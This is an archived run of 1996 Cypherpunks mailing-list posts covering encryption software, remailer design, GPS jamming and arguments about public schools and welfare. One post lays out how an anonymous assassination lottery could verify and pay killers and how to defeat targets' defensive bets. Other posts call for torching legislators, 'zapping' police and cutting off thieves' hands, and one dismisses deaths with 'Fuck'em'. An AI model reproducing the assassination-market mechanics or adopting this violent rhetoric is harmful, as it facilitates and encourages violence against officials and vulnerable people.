In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com>
Message-ID: <Pine.GSO.3.93.960928172435.22940D-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Tue, 24 Sep 1996, William H. Geiger III wrote:

> I just recently downloaded copies of Blowfish & Ghost.
> 
> Does anyone have any experiance with these two algorithims?
> 
> Does anyone know how they are using Blowfish and why?

A program called F-Secure Desktop for Windows 3.x and Windows 95 is using
Blowfish with 256-bit keys. It is meant for encrypting the files on your
hard disk and it works nicely together with Windows File Manager or
Windows95 shell. I would say it is one of the best strong and easy to use
HD encryption programs (only that it costs $$).

It is manufactured by Datafellows, who is also distributing F-Secure SSH.
You can download the demo version at http://www.datafellows.com/f-secure/

Why they are using it: may be because it is fast on Intel Pentium and
Pentium Pro processors, as discussed in Applied Cryptography? 

Jüri Kaljundi
AS Stallion
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Sun, 29 Sep 1996 08:50:13 +0800
To: cypherpunks@toad.com
Subject: What about making re-mailers automatically chain?
Message-ID: <3.0b15.32.19960928181545.006a6214@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


Would it be a good idea to have a re-mailer "randomly" decide whether to
send the mail to the destination or to another re-mailer.  If all
re-mailers performed this way, not even the sender would know the path.
The chain could be short sometimes and long others.  Granted, there is a
possibility that every mailer decides to chain instead of sending the
message to the recip, but some clever counter tag could keep the number of
links to a certain maximum.  The "randomness" of this would aid in traffic
analysis, and of course each mailer that decides to chain the mail would
encrypt under the next mailer's pub key.  Any thoughts?

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      |
 |          and on a plethora of key servers around the world.          |
 |                          Key ID = 0E818EC1                           |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 09:16:38 +0800
To: cypherpunks@toad.com
Subject: Igor Chudov's cypherpunks felony admission turned over to the appropriate authorities
Message-ID: <RqLZuD62w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Yo C'punks, check this out:

>Path: ...!newsfeed.internetmci.com!news.sgi.com!enews.sgi.com!news.mathworks.com!news.sprintlink.net!news-peer.sprintlink.net!arclight.uoregon.edu!netnews.worldnet.att.net!uunet!news-in2.uu.net!news1.gte.net!usenet
>From: netscum@gte.net
>Newsgroups: news.admin.net-abuse.misc,soc.culture.russian
>Subject: Chudov's published felony admission turned over to Commerce
>Date: Fri, 27 Sep 1996 03:16:06 GMT
>Organization: GTE Intelligent Network Services, GTE INS
>Sender: netscum@gte.net
>Distribution: Worldwide Net Scum
>Message-ID: <324b43fa.476946222@news.gte.net>
>Reply-To: yourself@netscum.org
>
>Igor Chudov's published admission of his willful and purposeful violation
>of ITAR laws (a criminal felony offense according the United States Code)
>has been turned over to the appropriate investigators at the Department of
>Commerce in Washington, D.C., who expressed interest in this incident,
>particularly because of the additional contributing factor of Chudov's visa
>status being under active investigation by the Department of Justice,
>Immigration and Naturalization Service.  Chudov's very bad example serves
>notice on the many netscum reading this article that "crime does not pay."

Also check out NetScum's home page at http://home1.gte.net/netscum.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 29 Sep 1996 11:29:56 +0800
To: jamesd@echeque.com
Subject: Re: Mousepad RNG's?
Message-ID: <199609290112.UAA17712@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: jamesd@echeque.com, cypherpunks@toad.com
Date: Sat Sep 28 20:04:39 1996
> Netscape was broken through weakness in the source of 
> truly random numbers.

No, it wasn't.  Netscape was broken because their
random numbers (really pseudorandom) were chosen
from very poor sources (on Unix boxes, pid and
ppid, maybe even the system clock :)

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Madness takes its toll . . . please have exact change ready."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMk3LMTVTwUKWHSsJAQEWbQf9H2+cssRqpNLBa2HTL7cDPbE8dOQaWN5Q
MicZPXU8ynZ4T1cw8YWHkJKsyHBR7JmAnor8dMkweAqGqu7OlGUZUTsBCoylUxjk
onpCFDfHBZk+87Kdcy4JIBeuWQZjsHelk38zS4wlmcDRjeS+yXCd86UhL1jK34Z2
PTrs9Xz2LMLuyIxLwLmVZofcgtXkbWnYS0wJ8QoEjgLLMS5SsMT5g11dPMARxHYY
J2XApz2fb1+CTErhaMx657+UK1ToYnbnU8ehpBSAHlOPqTIsYUOryjkAL6R+bgTo
MG/ZMKCuSOvvgASPBM00fcc0SUQqxICCNz7KX+GjgHvoNCuUy1IMmA==
=vgpk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 29 Sep 1996 13:05:35 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <v03007800ae71e5a92653@[207.167.93.63]>
Message-ID: <199609290126.UAA00307@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. May said:
> At 1:35 PM -0500 9/27/96, jbugden@smtplink.alis.ca wrote:
> >If you want to refuse those who are too stupid or anti-social from Public
> >Schools in order to improve the social or intellectual climate, you better
> >have
> >a solution for the resulting cast-offs.
> 
> (And I reject any of the common arguments that Americans need to learn
> history, the Constitution, etc. Few of them remember a single word they
> learned, and one might as well teach the basics in earlier grades and
> dispense with meaningless lectures about how and when the Senate may invoke
> cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.)

     I would assert that if children (ALL of them) had been thru a class
in the Hows and Whys of the constitution, rather than the glossing over 
that I remember, our government would be a lot different. I am not 
talking about _just_ an intense memorization of the document, but a 
reading of the federalist papers (which I still haven't gotten all the 
way thru) and a month or two of purely discussing and analyzing the 
document, the Feds couldn't get away with what they are doing. 

     I agree that students who aren't cut out for the academic life should
be incouraged to persue trades, or the arts (which IMO are simply trades,
and my degree will be a BFA when I finish that last Art History class) but
citizenship is _everyones_ responsibility, and there are too many people 
clamoring for laws & amendments without thinking, and without understanding
the process. Our schools are not turning out thinkers, and that is a (IMO)
a fatal flaw. 

     This is the OBCrypto part: For Crypto(in the sense of anonymity and
pseudoanonymity) to truely be accepted and appreciated by the "general 
public (yes, a vague term), they need to understand the history of anonymous
publications. They need to understand _why_ people should want to publish
anonymously.
     The other side is that for your "crypto-anarchy" to succeed, we need 
people who can understand things like "algorythms" and "mathmatical proofs".

     The rest of this is [NOISE]. 

> As I look around me, here in Santa Cruz, I see hundreds of "homeless
> persons.: We used to call them beggars, bums, panhandlers, winos, hobos,
> and drifters. The people unwilling to get up in the morning for a boring
> job, the people unwilling to take the donations they get and buy some new
> clothes at the Salvation Army (I know people of both sexes who buy their
> business clothes at thrift shops, at huge discounts, so I reject any of the
> usual arguments that this won't work.)

     I have bought "work clothes"--collared shirts, trousers &etc--at 
SalAr, and my wife still does. She works for the Merc as a secretary. 
These many of these people are unwilling to do _anything_ to help themselves,
and it is the fault of everyone who ever handed them a dime. As one 
former listmember ranted one day "You know why there are beggars in this 
city?"..."Because people like you (not me, his partner) GIVE THEM MONEY".
People wouldn't beg if it got them nothing.  

> When I see people working at Taco Bell, Burger King, gas stations, etc.,
> and then I see the so-called "homeless," the situation is completely clear
> to me. And, like pigeons, if you begin feeding the beggars, you'll have
> more of them.

     Oops. You made that point. 

> For the last couple of weeks I've been hauling 70-pound stones to build a
> retaining wall (don't ask me about the permits I should've gotten), ripping
> up redwood deck boards, digging postholes for a new fence, and generally
> doing a couple of hours of manual labor every day. While it has its
> advantages, in earlier days I could've counted on providing some employment
> for someone who today is "a homeless person." No more. They're not
> psychologically prepared to do a solid (if unspectacular) job, as they've
> been taught for all of their lives that they went through high school and
> maybe a couple of years of college (and maybe more) so they could join the
> professional ranks....when they see they really won't be joining the
> professional ranks, and that they really don't want to make the sacrifices
> to, they have nothing to fall back on.

     While I'd agree that this is true for many, I know some (me, my brother
and a couple of my cousins) that have done work like this more than once. 
Not that I would do that kind of work (for pay) today, unless I was _real_
desperate.

     Then again, it could be a family thing. 

> get money. They won't get "entitlements" from the government (= taxpayers,
> = those who are working, = me and thee). Tell them that a college education
> should only be pursued if one has a "calling" to be an engineer, a
> programmer (and probably not even that, judging by what I see), a doctor, a
> lawyer (on second thought, don't ever suggest they become lawyers), and so
> on.

     I see no reason that general programming shouldn't be considered a 
trade. Maybe more "pure" math than a carpenter, or a mechanic, but they
don't need the english, general history, & etc. that other "academic" 
careers need.  

> And make it easier to hire people, instead of harder. (And if one hires a
> maid, and the maid steals, cut off her hand. We've lost sight of justice,
> and people think that ripping off the rich is their kind of justice. This
> needs to change.)

     Cutting off hands is a little drastic. Too prone to false aqusations,
and too hard to erase if the courts are wrong. Three years at hard labor
on bare sustance would be about right tho', and if the aqusation is proved
false, it is erase from the record. 

> This is why crypto anarchy's starving of the tax system is good. It may
> "kill" some number of people, as nearly any new idea does, but ultimately
> it will put things back on track.
 
    People die for all manner of reasons every day. Fuck'em.
  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 29 Sep 1996 12:51:46 +0800
To: attila@primenet.com
Subject: Re: Public Schools
In-Reply-To: <199609280353.VAA23910@InfoWest.COM>
Message-ID: <199609290153.UAA00354@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


A person going by the name Attila said:

> = .     There is a solution. Trade Schools, 
>         The problem was simple:  we have only the now retiring
>     toolmakers who make it all possible.  engineering graduates will
>     not observe the manufacturing floors since it is above their 
>     dignity to roll of their sleeves.

     I knew too many engineering students to believe this. I knew one
(Civil Engineering) who had been a Paramedic, he wanted grease and
dirt on his hands, it may be harder to wash off, but much easier to
sleep off. 

>         if engineers were required to serve internships in the shops,
>     as doctors are required to intern in a hospital (and the really 
>     good ones, the top of the class, choose what I call meat-wagon 
>     wards (large city ER and trauma units), the U.S. would be a far 
>     healthier and competitive environment.

     No argument there.

>         I know, why the meat wagon wards with their pressure and
>     unreasonable hours?    experience, anything and everything
>     comes through those doors every night, and it goes off the scale
>     on the weekends...

     Hell, that desciribes the ER I used to work in, and it was in a 
college town. (Yes, I do have a sorted job history. Everything from 
a strip joint dj. to working as a designer for a Big 7 Accounting firm).

> = .It would also seem to
> = .follow that if parents were spending their own money (or 
> = .perceived it as their own money) that they would take a greater
> = .interest in their childrens education.
> = . 
>         ...if they were smart enough to start about age 3.  the

     Better late than never. 

>     themselves after dark.  (I do admit that one good scream would
>     have an extremely well-armed about to be posse out the door in
>     15 seconds...  --I doubt there would be prisoners!)

     In my neighborhood, screams are so common (mostly from kids playing, 
and yes, I do check as often as I can) that most people don't bother to
check. Very different worlds. My wife and I are probably the only ones
who _don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves.
The TV's were free, so were 2 of the computers.

>         a very unusual situation  --but I live in rural southern utah
>     where the regional middle school of 1200 can support 4 bands, the
>     freshman. and, where an average ward (100-150 families) will have
>     at least a dozen Eagle scouts.
>         proves your point, I guess...

     Prove? I don't know, but it is some pretty solid evidense. Communism
at it's finest. A community of people who work together and take care of 
each other voluntarily for the common good. <hee hee> 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 13:59:26 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: GPS
Message-ID: <199609290407.VAA20249@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>2. The DoD is doing a study right now on how to make GPS useless to the
>enemy at wartime.
>I think figuring out a way to turn off A/S and getting accurate GPS on
>commercial equipment at all times would make a nifty Cypherpunks project
>- if it really involves breaking some encryption.

Essentially the A/S works by having the publicly-readable signal
contain fuzz fuzz in the low-order bits and the encrypted signal contain 
the real stuff; if they've done decent encryption, you won't crack it.

However, the fuzz _is_ consistent - if you've got two nearby points,
and you really know where one of them is, you can correct for it,
and get better accuracy even than the full GPS with A/S turned off.
The approach the Feds are taking to prevent competition from real
differential GPS is to field a differential GPS system of their own,
located at/near airports (who are the real people who want D-GPS,
so they can do things like better instrumented or automated landings.)
This way, nobody's got much financial incentive to deploy D-GPS
correction transmitters of their own, and manufacturers have an incentive
to deploy equipment tuned to the FAA's correction transmitters,
so they can still turn them off if they want to.  

Except for takeoff/landing, airplanes don't much need differential GPS;
you shouldn't be flying within a hundred meters of other planes anyway,
and if you're doing cropdusting or barnstorming you'd better be able
to see what you're doing or have good radar anyway - most topographic
maps don't have tall trees marked on them.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 14:28:42 +0800
To: cypherpunks@toad.com
Subject: Technical difficulties with AP [AP NOISE]
Message-ID: <199609290407.VAA20253@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Aside from details like dead bodies, vendettas, and government suppression,
there are technical complications with Assassination Politics
that make it more than the simple job Jim Bell is imagining.
Some of them provide ways to defend against AP, and turn it into more like
Extortion Politics.

        [Do I _really_ want to bring up more discussion of AP?
        Not sure, but if it's clear that it won't work very well,
        it'll be less likely for the government media to freak about :-)]

Let's look at the critical part of the problem - paying the assassin.
The model we've generally been using is that the players are the
victim, the escrow agent who manages the system, an enthusiastic public,
and the assassin or assassins who are competing for the jackpot.

I can see three approaches to identifying the correct payee:
1) Payee provides physical evidence to the escrow agent - 
        the traditional approach doesn't work here: since the
        escrow agent is anonymous, so you can't mail him the
        victim's wallet or finger with well-known fingerprint or whatever.
2) Assassin leaves physical evidence at the scene which the news media
        would be likely to report, which payee confirms with escrow
        agent, presumably committing in advance (e.g. after the event,
        the payee sends a key which allows the escrow agent to decode
        the encrypted message that said "I'm leaving a note on the body
        saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'.")
        Works fine for the first couple of assassinations, but after a while
        the police will catch on and stop revealing kinky details to the media.
3) The main solution has been the gambling deal - 
        it's just a lottery on the date of death of the victim, which presumably
        the payee will win because he knows when the assassin will strike.
        For a lottery to be effective, prospective assassins need to
        be able to determine how much the jackpot is and who the victim is,
        so they can place their bets and be the closest winner.

        But the prospective victim can also play, individually or as part
        of an insurance pool (which is especially valuable for victims like
        "the first IRS agent to be assassinated".)  Obviously you don't want
        to just bid up the price on your own head, so it needs to be accompanied
        by publicity that the IRS Agents' Benevolent Association is placing
        a large number of small bets every day to maximize the chances that
        _they_ will collect the money rather than the assassins.
        If the times that the bets are for are published, you can beat this,
        but you also invite speculators to be small bets just before and after
        your bets, so it becomes a mishmash and perhaps a race condition.
        If the times aren't published, the assassin can make lots of bets
        surrounding the planned date of the hit, which is also a warning
        to the prospective victim to be careful if the bets on his demise
        start increasing rapidly.
        
        This does make the AP lottery somewhat of an extortion deal - 
        by advertising that someone is a target, you're forcing them to
        continually make lots of bets.  But if they've got any way of tracing
        money, even partially, it'll help them find the escrow agent,
        who can then be targeted for justice of one sort or another.
        You're also forcing the assassin to make lots of bets, though in
        a jackpot system the successful payee will recover most of it.

        To some extent the defense can be fought if the escrow agent
        wants to establish a minimum bet, say $100, which an assassin
        can afford to make a few of for the targeted day, but the
        victim can't keep paying too much.  This also reduces the
        since of the potential better pool, and therefore reduces
        the jackpot and the attractiveness of the job to the assassin.
        Lots of people might be willing to spend $5 to contribute;
        $100 bets are much fewer, especially if there are enough
        targets to successfully overthrow a government.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 14:30:55 +0800
To: cypherpunks@toad.com
Subject: Re: [NOT NOISE] Jena Remailer
Message-ID: <199609290412.VAA20552@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:10 PM 9/28/96 -0700, anonymous wrote:
>My first thought was to have them sent to a non-autopinging *.test ng
>via a well-tested parsing mail2news gate, but some autopingers ping ALL
>*.test traffic passing through a site.  If these ping messages didn't
>get automatically bitbucketed at the remailer site, this could be a
>problem for the operator.

Most of the autopingers will ignore messages with "ignore" in 
the Subject: line.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 29 Sep 1996 13:01:01 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Making Remailers Widespread
In-Reply-To: <siyyuD50w165w@bwalk.dm.com>
Message-ID: <199609290222.VAA00392@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


KOTM said:
> Bill Stewart <stewarts@ix.netcom.com> writes:
> > Doing two-way remailers would be better, but that's still a hard problem,
> > and I don't want to widely deploy shoddy two-way-remailers.

     While IANAC, maybe a suggestion here (and there might be holes in 
this) when the email is sent to the remailer, it gets a key pair generated,
and one of the keys is inserted into the header of the forwarded email
like this:

*****This is an anonymous message forwared from the spread remailer*****
*****To reply to this message, send email with the following 4 lines**** 
*****as the first part of the message to:                          *****

=>replykey:<key goes here.

     The reply address is encrypted with the other part of the key. It 
isn't real secure, but the server admin can't get the return addresses
without the key. 
    
     Off the top of my head, the biggest problem is that you can't send 
email to a web site (page).

     The other problem is that it would greatly add to the complexity
of the .pl program, and make it take much more overhead. What about
making the one way a .pl script, and the two way a module?       

    
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 29 Sep 1996 14:24:10 +0800
To: hallyn@cs.wm.edu>
Subject: Re: sophie germain primes
Message-ID: <199609290436.VAA16148@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sir:

Lot's of stuff on primes, right here:

http://daisy.uwaterloo.ca/~alopez-o/math-faq/node10.html

Hope it helps.


On or About 28 Sep 96 at 23:44, Serge E. Hallyn wrote:

> Could anyone direct me to an online list of small (less than 800-digit)
> Sophie Germain primes?
> 
> (actually any list would do)
> 
> many thanks,
> -serge
> 
> hallyn@cs.wm.edu
> 
> 

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 15:33:11 +0800
To: "ronsimpson@unidial.com>
Subject: Re: Public Schools
Message-ID: <19960929052112562.AAH154@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 09:22:05 -0400, ronsimpson wrote:

>I hate to burst any bubbles but, the school with the highest number of
>National Merit Finalists and highest number of 1600 SATs is a Public
>High School (Jefferson High in Fairfax, VA)

This probably just means that they have a good SAT cram course.    Ditto for
the NMS.    I've run into people who've done well on the SATs and have been
rather underwhelmed.   In my opinion it's like MIPS: Meaningless Indicator



#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Sep 1996 15:50:27 +0800
To: cypherpunks@toad.com
Subject: Utah as a Religious Police State
In-Reply-To: <199609290153.UAA00354@smoke.suba.com>
Message-ID: <v03007800ae73c56eff85@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


Hey, Attila, let me know where you folks live...I may want to move there!

At 2:56 AM +0000 9/29/96, attila wrote:

>        the population base is changing with an influx of non-Mormons
>    in town, so R rated are showing up at the theatres and video
>    rentals in town.

Just so long as my DSS dish still works in Utah--hey, I'll invite all the
jack Mormons over for tomorrow night's showing of "Inside Janine," on the
"Playboy Channel." (The "Playboy Channel" is kind of tame by video rental
standards, but more crotch shots than we used to see a couple of years ago.)

>        the police visible prescence is effective --a force of 50+ for
>    a population base < 25,000, plus the county sherrif cars and the
>    state police.   Curfew is 10pm weekdays for minors --and they
>    enforce it, big time.  midnight Fri/Sat.

They enforce the "curfew" big time?

Looks like some Mormon pigs need to be zapped.

(My kids don't cotton to no cop telling them when they can be out in public
and when they can't. Any cop who tries to stop my kids from being out has
earned severe retaliation. Any councilmember or state legislator who voted
for such a curfew needs to be hog-tied, covered with tar, then torched.)

I guess this is why I wouldn't last very long in Mormon Country. A fascist
encampment, it sounds like.

(I have no problem with Mormons, or Catholics, or Muslims, or Satanists
keeping _their own_ children indoors after 7, or 5, or whatever their Holy
Hour or Curfew Hour is, but no fucking religious nuts are going to tell
_me_ when _my_ children must be indoors. I determine where my children may
be, and I don't need the State's permission for them to be out. I would
think anyone with an iota of libertarian sentiment would understand this.)

>        ...idle hands are the devil's workshop. you want good solid
>    kids, you start from the gate and keep 'em busy: home, neighbors,
>    school, church, etc.

Do Utah's cops also enforce this law, too?


>            they do not date until they are 16 --in groups.  boys and
>    girls --the same rules.

With the Utah State Police enforcing this "dating curfew"?


(I may sound harsh here, but "curfew" means one and only one thing to me:
somebody restricting my freedom of those of my children to be a public
place. Should one of my children be picked up by cops for doing nothing
illegal, save for being "out past curfew," I'd consider violent response to
be justified. It sounds to me--not that I ever thought otherwise--that Utah
is not a land that favors liberty.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:02:58 +0800
To: "tcmay@got.net>
Subject: Re: Public Schools
Message-ID: <19960929054253390.AAA193@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 09:20:10 -0800, Timothy C. May wrote:

>(Seriously, my view is that schools are not very important. All success,
>academic or technical, derives from one basic determining factor: those who
I always liked Robert Heinlein's comment:  "It's possible to get a good
education anywhere, if you are willing to work for it".  Unfortunately not
many people want to work for anything...
>read for pleasure, succeed, and those who don't read for pleasure, don't.
++agree.   

>taught usable trades. Seriously. Our "ideal" that all children should
>attend college is absurd, given the lack of academic preparation, desire,
>and reading skills that so many high school students lack. Most community

Not only that, what are all these college grads going to do?   Only a small
percentage are going to be making waves in a given field.   Many are just
going to lower the overall average...  Worse yet, many become lawyers <g>.  
A society with such a high percentage of parasites (those who don't add value
sufficient to cover expenses) isn't healthy.

>colleges are essentially becoming Grades 13-14, with most of the Grade
Why are they going to college?  Well they weren't learning it in HS.  They
did however learn to feel good about themselves, use a condom and handle
complex social situations (see: gossip.  Or, for the average guy, see:
wedgie).
What use this serves is an excellent question.

>13-14 students reading at the 9th-grade level (which most of us on this
>list were reading at when we were in the 7th-grade, or earlier).)
That's putting it mildly. . .    I read 200+ pages/hour with a very high
retention rate.  Needless to say, this means I move through books at high
speed.   Quite a few times I've had the experience of summarizing a "Great
Work" to a college-educated teacher.    Almost scary.    Equally bad are the
people who read but do not understand.   The term functionally illiterate
comes to mind.   We may joke that people switch into "Idiot Mode" (Apologies
to the BOFH author) around computers but I've run into a number of people who
are apparently stuck in it.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 29 Sep 1996 15:56:47 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: GPS
In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com>
Message-ID: <Pine.3.89.9609282237.A6052-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sat, 28 Sep 1996, Bill Stewart wrote:
[Quoting sombody else]
> >2. The DoD is doing a study right now on how to make GPS useless to the
> >enemy at wartime.
> >I think figuring out a way to turn off A/S and getting accurate GPS on
> >commercial equipment at all times would make a nifty Cypherpunks project
> >- if it really involves breaking some encryption.
[...]

> Except for takeoff/landing, airplanes don't much need differential GPS;
> you shouldn't be flying within a hundred meters of other planes anyway,
> and if you're doing cropdusting or barnstorming you'd better be able
> to see what you're doing or have good radar anyway - most topographic
> maps don't have tall trees marked on them.

It may be considerably more than 100 meters if you have the ill fortune 
to get caught in one of the GPS jamming tests the Air Force is currently 
conducting. AOPA Pilot reports in their September issue that only now the 
Air Force has at least agreed to clasify their GPS-ECM (Electronic 
Countermeasures) as distance notams, meaning they'll warn pilots in advance.

Anyway, encryption has nothing to do with these ECM.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:05:23 +0800
To: "tcmay@got.net>
Subject: Re: Workers, Public Schools, Tradesmen, and Justice
Message-ID: <19960929055435234.AAA224@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 13:01:13 -0800, Timothy C. May wrote:

>My conclusion is simple: Tell people if they don't work, they won't eat. If
>they do something others are willing to give them money to do, they won't
>get money. They won't get "entitlements" from the government (= taxpayers,
>= those who are working, = me and thee). Tell them that a college education
>should only be pursued if one has a "calling" to be an engineer, a
>programmer (and probably not even that, judging by what I see), a doctor, a
I've noticed that many places are concerned more with things like creativity,
adapability, drive, etc when hiring a CS grad.  I've found that having a
resume that shows these kind of traits well overcame the lack of a degree
(I'm working on that). There was a thread about this in comp.lang.cobol
awhile back. 
>lawyer (on second thought, don't ever suggest they become lawyers), and so
>on.

The old way was that your HS provided what the mythical average person needed
to go about life. College was for the more "complex" careers.

>And make it easier to hire people, instead of harder. (And if one hires a
>maid, and the maid steals, cut off her hand. We've lost sight of justice,
>and people think that ripping off the rich is their kind of justice. This
>needs to change.)

You don't even need to be that harsh.  Chain-gang work to pay off stolen
property would be more effective, if for no reason other than that you'd get
your money (or property) back.

>Psychologists and similar psychobabblers call it "tough love." If one
>always "enables" an addict, a layabout, a shiftless worker, with excuses
>and handouts, the behavior does not change. To save a person, sometimes
>harshness is needed.

>This is why crypto anarchy's starving of the tax system is good. It may
>"kill" some number of people, as nearly any new idea does, but ultimately
>it will put things back on track.


And you have to look at it from another point of view:   If it would
ameliorate the problems in the future for the majority of the population,
it'd be worth a bit of discomfort now.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 29 Sep 1996 16:19:23 +0800
To: "tcmay@got.net>
Subject: Re: Public Schools
Message-ID: <19960929061014609.AAA180@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote:

>>        a very unusual situation  --but I live in rural southern utah
>>    where the regional middle school of 1200 can support 4 bands, the
>>    top 2 being very impressive, and provide full AP classes, and ACT

>Wow! Utah is teaching AP?  Is Jim Bell being brought in as a Special Lecturer?
>(I knew Idaho has special Militia classes, but to hear that Utah is now
